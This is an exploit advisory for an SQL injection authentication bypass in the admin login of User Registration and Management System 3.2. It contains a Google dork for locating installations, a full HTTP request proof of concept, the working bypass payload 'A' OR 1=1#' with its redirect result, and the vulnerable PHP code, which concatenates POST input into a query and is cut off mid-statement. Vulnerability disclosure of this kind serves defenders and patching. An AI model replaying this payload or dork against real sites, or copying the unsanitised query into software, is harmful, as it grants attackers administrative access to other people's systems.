Headline
User Registration And Management System 3.2 SQL Injection
User Registration and Management System version 3.2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.:. Exploit Title > User Registration & Management System - SQLi.:. Google Dorks .:.inurl:loginsystem/index.php.:. Date: June 18, 2024.:. Exploit Author: bRpsd.:. Contact: cy[at]live.no.:. Vendor -> https://phpgurukul.com/.:. Product -> https://phpgurukul.com/?sdm_process_download=1&download_id=7003.:. Product Version -> Version 3.2.:. DBMS -> MySQL.:. Tested on > macOS [*nix Darwin Kernel], on local xampp@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#############|DESCRIPTION|#############"User Management System is a web based technology which manages user database and provides rights to update the their details In this web application user must be registered. This web application provides a way to effectively control record & track the user details who himself/herself registered with us."===========================================================================================Vulnerability 1: Unauthenticated SQL Injection & Authentication bypassTypes: error-basedFile: localhost/admin/index.phpVul Parameter: USERNAME [POST]POST PoC #1: http://tom:8080/loginsystem/admin/index.phpHost: tomUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 38Origin: http://tomConnection: keep-aliveReferer: http://tom/loginsystem/admin/index.phpCookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2aUpgrade-Insecure-Requests: 1username='&password=test&login=Response: Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /Applications/XAMPP/xamppfiles/htdocs/loginsystem/admin/index.php on line 9===========================================================================================Test #2 => Payload to skip authenticationhttp://localhost:9000/loginsystem/admin/index.phpusername=A' OR 1=1#&password=1&login=Response:302 redirect to dashboard.php===========================================================================================Vuln File:/loginsystem/admin/index.phpVul Code:<?php session_start();include_once('../includes/config.php');// Code for loginif(isset($_POST['login'])){$adminusername=$_POST['username'];$pass=md5($_POST['password']);$ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'");$num=mysqli_fetch_array($ret);if($num>0)